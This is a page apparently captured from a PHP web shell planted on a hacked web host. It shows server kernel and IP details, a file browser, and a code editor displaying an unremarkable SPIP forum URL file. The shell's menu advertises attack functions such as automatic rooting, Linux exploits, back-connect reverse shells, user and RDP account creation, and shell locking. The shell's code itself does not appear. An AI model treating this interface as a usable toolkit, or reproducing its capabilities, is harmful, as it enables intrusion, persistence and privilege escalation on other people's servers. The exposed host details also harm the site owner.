Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
forum /
urls /
[ HOME SHELL ]
Name
Size
Permission
Action
generer_url_ecrire_forum.php
1.13
KB
-rw----r--
generer_url_forum.php
1021
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generer_url_forum.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } function urls_generer_url_forum_dist($id_forum, $args = '', $ancre = '') { if ($id_forum = intval($id_forum)) { include_spip('inc/forum'); [$type, $id, ] = racine_forum($id_forum); if ($type) { if (!$ancre) { $ancre = "forum$id_forum"; } return generer_objet_url($id, $type, $args, $ancre, true); } } return ''; }
Close